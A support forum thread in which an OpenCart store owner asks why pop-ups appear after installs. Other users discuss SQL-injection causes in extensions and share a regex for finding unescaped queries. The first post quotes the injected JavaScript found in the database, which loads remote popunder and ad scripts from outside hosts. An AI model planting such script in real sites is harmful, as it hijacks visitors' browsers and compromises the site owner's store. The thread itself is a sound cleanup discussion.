Post by ScuzUK » Tue Jun 20, 2017 10:55 pm

I'm brand spanking new to opencart but I keep getting pop ups after fresh installs. Each install I've changed the admin name/password, changed the admin url but it keeps happening.

Whats the cause and how can I stop it?

Code: Select all

<script type="text/javascript">//<![CDATA[ 
(function() {
    var configuration = {
    "token": "11f0dc1ed8453e409e04d86bea962f34",
    "exitScript": {
        "enabled": true
    },
    "popUnder": {
        "enabled": true
    }
};
    var script = document.createElement('script');
    script.async = true;
    script.src = '//cdn.shorte.st/link-converter.min.js';
    script.onload = script.onreadystatechange = function () {var rs = this.readyState; if (rs && rs != 'complete' && rs != 'loaded') return; shortestMonetization(configuration);};
    var entry = document.getElementsByTagName('script')[0];
    entry.parentNode.insertBefore(script, entry);
})();
//]]></script><script data-cfasync="false" type="text/javascript" src="//p79479.clksite.com/adServe/banners?tid=79479_127480_7&amp;tagid=2"></script><script type="text/javascript" src="//go.pub2srv.com/apu.php?zoneid=683723"></script><script async="async" type="text/javascript" src="//go.mobisla.com/notice.php?p=683724&amp;interactive=1&amp;pushup=1"></script>

Newbie

Posts

Joined
Tue Jun 20, 2017 10:47 pm

Post by IP_CAM » Wed Jun 21, 2017 12:08 am

Well, what are you trying to tell us? ???
The Code, you've added, has nothing to do with OC.
Ernie

My Github OC Site: https://github.com/IP-CAM
5'200 + FREE OC Extensions, on the World's largest private Github OC Repository Archive Site.


User avatar
Legendary Member

Posts

Joined
Tue Mar 04, 2014 1:37 am
Location - Switzerland

Post by ScuzUK » Wed Jun 21, 2017 12:29 am

Every time I look at the category description in code in open cart its been changed to the following:
Image

What is causing this and how do I stop it?

Newbie

Posts

Joined
Tue Jun 20, 2017 10:47 pm

Post by k2tec » Wed Jun 21, 2017 12:59 am


User avatar
Active Member

Posts

Joined
Mon Apr 12, 2010 8:06 pm

Post by ScuzUK » Wed Jun 21, 2017 2:42 am

k2tec wrote:
Wed Jun 21, 2017 12:59 am
viewtopic.php?t=183438
Did I miss a "fix" in that thread? Not being rude, totally grateful for the help but I don't see a change this or upload this.

Newbie

Posts

Joined
Tue Jun 20, 2017 10:47 pm

Post by IP_CAM » Wed Jun 21, 2017 3:04 am

well, what FIX do you expect ? There is no simple Fix for such,
it depends on many different things, starting from the server setup
and ending on the individual Software and Installation. That's why it takes
Professionals, to secure Servers and Software, and it's an ongoing
task, to keep it secure. So, better click the link on k2tec's posting, and
you find at least some valuable Information, on, what you can do about.
Ernie

My Github OC Site: https://github.com/IP-CAM
5'200 + FREE OC Extensions, on the World's largest private Github OC Repository Archive Site.


User avatar
Legendary Member

Posts

Joined
Tue Mar 04, 2014 1:37 am
Location - Switzerland

Post by k2tec » Wed Jun 21, 2017 3:16 am

Like IP_CAM says there is no simple solution for this problem. It can be your own PC or a bad module. Or your neighbor on a shared server.
You have to compare your site with orginal files of OC and search for src='//p79479.clksite.com in your database and delete the javascript.

If it is a fresh install download it from the OC site and not with the installer of your hoster.

User avatar
Active Member

Posts

Joined
Mon Apr 12, 2010 8:06 pm

Post by ADD Creative » Wed Jun 21, 2017 9:23 pm

What theme and extensions are you using? Have you looked in your server logs to see if there is anything unusual?

www.add-creative.co.uk


Expert Member

Posts

Joined
Sat Jan 14, 2012 1:02 am
Location - United Kingdom

Post by sims » Thu Jun 22, 2017 7:12 pm

There is a pattern emerging here

What we know as facts:

1 Affects Opencart from versions 1.5.5.1 to 2.3.0.2

2. A wide variety of different themes

3. The code is injected into the database

4. No file(s) are uploaded or altered on the web server

5. No admin login used

6. Many different Hosting companies

New member

Posts

Joined
Fri Apr 21, 2017 11:49 pm

Post by IP_CAM » Thu Jun 22, 2017 8:22 pm

well, I am not sure, and so far, I never have heard of someone yet, using a v.1.5.6.x Version,
so, I assume, that it could likely also be an OcMod, doing such things. This, since OcMod Content
it placed in the DB, in contrary to VqMod Content, and if a smart fellow would be able, to
modify an OcMod, it would be the easiest way to mess up a software. And even an unsuccessful
attempt, to install an OcMod, usually leaves it's content in a Shop Extension Directory, until removed again,
as I found out, so, a real Pro may find different ways, to add bad Code, without a user beeing aware of it.

Just a wild guess... 8)
Ernie

My Github OC Site: https://github.com/IP-CAM
5'200 + FREE OC Extensions, on the World's largest private Github OC Repository Archive Site.


User avatar
Legendary Member

Posts

Joined
Tue Mar 04, 2014 1:37 am
Location - Switzerland

Post by ADD Creative » Tue Jun 27, 2017 4:45 am

sims wrote:
Thu Jun 22, 2017 7:12 pm
There is a pattern emerging here

What we know as facts:

1 Affects Opencart from versions 1.5.5.1 to 2.3.0.2

2. A wide variety of different themes

3. The code is injected into the database

4. No file(s) are uploaded or altered on the web server

5. No admin login used

6. Many different Hosting companies
That does seem to be the case. Given that there have been a few reports of the code injected into the database, but not the 1000s you would expect if every OpenCart store was vulnerable (I've not seen it on any of our client's sites so far). There has been at least one known theme with a vulnerability, so could be more out there (viewtopic.php?f=179&t=183812). I believe the issue is less likely to do with the OpenCart core and more likely to be down to extensions or configuration for the following reasons.

While working on sites for clients, we've found a few extension that have had SQL vulnerabilities (we reported these to the authors). At least one of these was used to successfully attack a site. There must be 100s of badly written extensions out there.

I've looked through a lot of the code for version 1.5.5.1, for a project I work on backporting bug fixes and security fixes to older versions of OpenCart. I've not seen any places where SQL could be injected (that's not to say there isn't). I've use the follow regex search in a text editor (Notepad++ but other will also do it). It's not perfect and will miss a lot and for 1.5.5.1 it finds 12 hits in 7 files of possible places, but nothing looks like they could be used in an injection to me.

Code: Select all

'%?"[\s]*\.[\s]*\$(?!(this->db->escape|db->escape))[\w]+
Can you run the regex search on your 1.5.5.1 install to see if you get anything different (search .php, .tpl and .xml files)?

www.add-creative.co.uk


Expert Member

Posts

Joined
Sat Jan 14, 2012 1:02 am
Location - United Kingdom

Post by sims » Tue Jun 27, 2017 7:39 pm

@ADD creative

thanks for taking the time to reply

I stand by my statements - they are all correct (I did not say it was due to core Opencart files)

I literally searched for that regex string (is that what you meant me to do?) and could not find it
EDIT forget that! I forgot to tick the regex box

What do you want me do with search results ?

New member

Posts

Joined
Fri Apr 21, 2017 11:49 pm

Post by ADD Creative » Thu Jun 29, 2017 12:33 am

How many results did it get? You could post the results here (remove anything other shouldn't see first). Or message me them and I'll compare to a default install of 1.5.5.1.

www.add-creative.co.uk


Expert Member

Posts

Joined
Sat Jan 14, 2012 1:02 am
Location - United Kingdom
Who is online

Users browsing this forum: No registered users and 25 guests